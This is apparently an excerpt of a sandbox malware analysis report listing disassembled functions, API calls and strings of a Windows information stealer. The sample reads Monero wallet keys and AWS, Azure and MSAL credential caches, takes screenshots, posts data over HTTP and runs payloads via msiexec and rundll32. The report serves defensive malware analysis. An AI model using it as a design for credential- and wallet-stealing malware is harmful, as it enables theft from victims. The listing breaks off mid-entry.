                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00185A48
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 00185A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00185BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011CE768,00000000,?,011CA630,00000000,?,001A1B4C), ref: 00185EC1
                                        • lstrlen.KERNEL32(00000000), ref: 00185ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00185EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00185EEA
                                        • lstrlen.KERNEL32(00000000), ref: 00185EFF
                                        • lstrlen.KERNEL32(00000000), ref: 00185F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00185F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00185F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00185F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00185F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 00186000
                                        • InternetCloseHandle.WININET(00000000), ref: 0018600D
                                        • HttpOpenRequestA.WININET(00000000,011CE838,?,011CE398,00000000,00000000,00400100,00000000), ref: 00185C48
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00186017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 855f424bbaff0f716d8a3a9fbe0b2cc49ee28d19aa889e8b973b9079e53229fb
                                        • Instruction ID: d588238701291c5cfbb03295891a465dc4de9cf67a9806b2f3f6a632b0d4127b
                                        • Opcode Fuzzy Hash: 855f424bbaff0f716d8a3a9fbe0b2cc49ee28d19aa889e8b973b9079e53229fb
                                        • Instruction Fuzzy Hash: 0B129D71920118ABCF15EBA0DCA5FEEB379BF24700F5045A9F10666192EF706B48CFA5
                                        Function 0018CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018D1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0018D1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D308
                                        • lstrcat.KERNEL32(?,001A1570), ref: 0018D317
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D32A
                                        • lstrcat.KERNEL32(?,001A1574), ref: 0018D339
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D34C
                                        • lstrcat.KERNEL32(?,001A1578), ref: 0018D35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D36E
                                        • lstrcat.KERNEL32(?,001A157C), ref: 0018D37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D390
                                        • lstrcat.KERNEL32(?,001A1580), ref: 0018D39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D3B2
                                        • lstrcat.KERNEL32(?,001A1584), ref: 0018D3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D3D4
                                        • lstrcat.KERNEL32(?,001A1588), ref: 0018D3E3
                                          • Part of subcall function 0019AB30: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DDF), ref: 0019AB3B
                                          • Part of subcall function 0019AB30: lstrcpy.KERNEL32(001A0DDF,00000000), ref: 0019AB95
                                        • lstrlen.KERNEL32(?), ref: 0018D42A
                                        • lstrlen.KERNEL32(?), ref: 0018D439
                                          • Part of subcall function 0019AD80: StrCmpCA.SHLWAPI(00000000,001A1568,0018D2A2,001A1568,00000000), ref: 0019AD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018D4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 7344fbee80c7a4457c797de7c8b026a5f82e1baa5930868827588d97517a636a
                                        • Instruction ID: 3bed5fa1d26e117da5d83a4d6edabd0b15520b68913412824fd1430544029bad
                                        • Opcode Fuzzy Hash: 7344fbee80c7a4457c797de7c8b026a5f82e1baa5930868827588d97517a636a
                                        • Instruction Fuzzy Hash: DAE1E171914208ABCF04EBA0ED96EEE7379AF64301F5045A4F107771A2DF31BA48CBA5
                                        Function 0018CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011CD038,00000000,?,001A1544,00000000,?,?), ref: 0018CB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0018CB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0018CB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0018CBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0018CBD9
                                        • StrStrA.SHLWAPI(?,011CCF90,001A0B56), ref: 0018CBF7
                                        • StrStrA.SHLWAPI(00000000,011CCFA8), ref: 0018CC1E
                                        • StrStrA.SHLWAPI(?,011CD940,00000000,?,001A1550,00000000,?,00000000,00000000,?,011C90D8,00000000,?,001A154C,00000000,?), ref: 0018CDA2
                                        • StrStrA.SHLWAPI(00000000,011CD7C0), ref: 0018CDB9
                                          • Part of subcall function 0018C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C971
                                          • Part of subcall function 0018C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C97C
                                        • StrStrA.SHLWAPI(?,011CD7C0,00000000,?,001A1554,00000000,?,00000000,011C9058), ref: 0018CE5A
                                        • StrStrA.SHLWAPI(00000000,011C92A8), ref: 0018CE71
                                          • Part of subcall function 0018C920: lstrcat.KERNEL32(?,001A0B47), ref: 0018CA43
                                          • Part of subcall function 0018C920: lstrcat.KERNEL32(?,001A0B4B), ref: 0018CA57
                                          • Part of subcall function 0018C920: lstrcat.KERNEL32(?,001A0B4E), ref: 0018CA78
                                        • lstrlen.KERNEL32(00000000), ref: 0018CF44
                                        • CloseHandle.KERNEL32(00000000), ref: 0018CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 77eead63a5973111221ccd9ae1b2f4cf6ce8af7adcf8279cbee39c45a55c41fb
                                        • Instruction ID: 8777f999a37f64a105e05213dbe0cc0067b171216a71504f8d368253841fcbcb
                                        • Opcode Fuzzy Hash: 77eead63a5973111221ccd9ae1b2f4cf6ce8af7adcf8279cbee39c45a55c41fb
                                        • Instruction Fuzzy Hash: 23E1BB71910108ABCF15EBA4DCA2FEEB779BF64300F4045A9F10767192EF306A49CBA5
                                        Function 001984B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,011CB4C8,00000000,00020019,00000000,001A05BE), ref: 00198534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001985B6
                                        • wsprintfA.USER32 ref: 001985E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0019860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0019861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00198629
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 695b852e0998d637f899a6f3e04ea82be20b9fa1888577f7b5e06d72f47c79b2
                                        • Instruction ID: e214920878d5dbf858ec3209eaf5beed1ca7eec509cf205db500e506910b4c3d
                                        • Opcode Fuzzy Hash: 695b852e0998d637f899a6f3e04ea82be20b9fa1888577f7b5e06d72f47c79b2
                                        • Instruction Fuzzy Hash: B1812D719102189BDB28DB54DD95FEA77B8BF18700F5086E8F10AA6141DF70AB88CFE4
                                        Function 00194FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00195000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 0019501D
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194B7C
                                          • Part of subcall function 00194B60: FindFirstFileA.KERNEL32(?,?), ref: 00194B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 0019508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 001950A9
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC8), ref: 00194BD7
                                          • Part of subcall function 00194B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
                                          • Part of subcall function 00194B60: FindClose.KERNEL32(000000FF), ref: 00194DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00195118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00195135
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194C00
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A08D3), ref: 00194C15
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194C32
                                          • Part of subcall function 00194B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00194C6E
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,011CE928), ref: 00194C9A
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,001A0FE0), ref: 00194CAC
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,?), ref: 00194CC0
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,001A0FE4), ref: 00194CD2
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,?), ref: 00194CE6
                                          • Part of subcall function 00194B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00194CFC
                                          • Part of subcall function 00194B60: DeleteFileA.KERNEL32(?), ref: 00194D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: f90b0148544ee6caa6cf0b8660126510ee59501c17cb3fc3d9352e20d28405b3
                                        • Instruction ID: d4d80ec85cff33772e2b4c2908ff5965c01c30883e4b2787bad16eafc64bad70
                                        • Opcode Fuzzy Hash: f90b0148544ee6caa6cf0b8660126510ee59501c17cb3fc3d9352e20d28405b3
                                        • Instruction Fuzzy Hash: 3B4183BA94430867DF10F760EC57FDD73285B66705F404594B249A6082EFB4ABC88B92
                                        Function 001991A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001991FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: bb2fe291c243e780142cdac4ba49165ee542b47c52a034b04613edc3ae990608
                                        • Instruction ID: e77e75ae8c35c7851c8fdfafbb82c467cc2e3e01c11011fd8e0acebb0a79cad7
                                        • Opcode Fuzzy Hash: bb2fe291c243e780142cdac4ba49165ee542b47c52a034b04613edc3ae990608
                                        • Instruction Fuzzy Hash: 5871ED71910208ABDB14EFE4EC89FEEB778BF58701F108568F516A7291DB34EA04CB64
                                        Function 00193080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00193415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 001935AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0019373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: aebc0cd098a8d70853ffc43bc1436736a8acc7a564f7d3163d0d08ad515403df
                                        • Instruction ID: b619a1ceb65a4230b56784276bc476ecdabe366985c35e0245dea7db5a3d4250
                                        • Opcode Fuzzy Hash: aebc0cd098a8d70853ffc43bc1436736a8acc7a564f7d3163d0d08ad515403df
                                        • Instruction Fuzzy Hash: 0112EB719101189ACF19EBA0DDA2FEDB739AF24300F804599F50766192EF346B4DCBA5
                                        Function 00189BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                        Download Yara Rule
                                        APIs
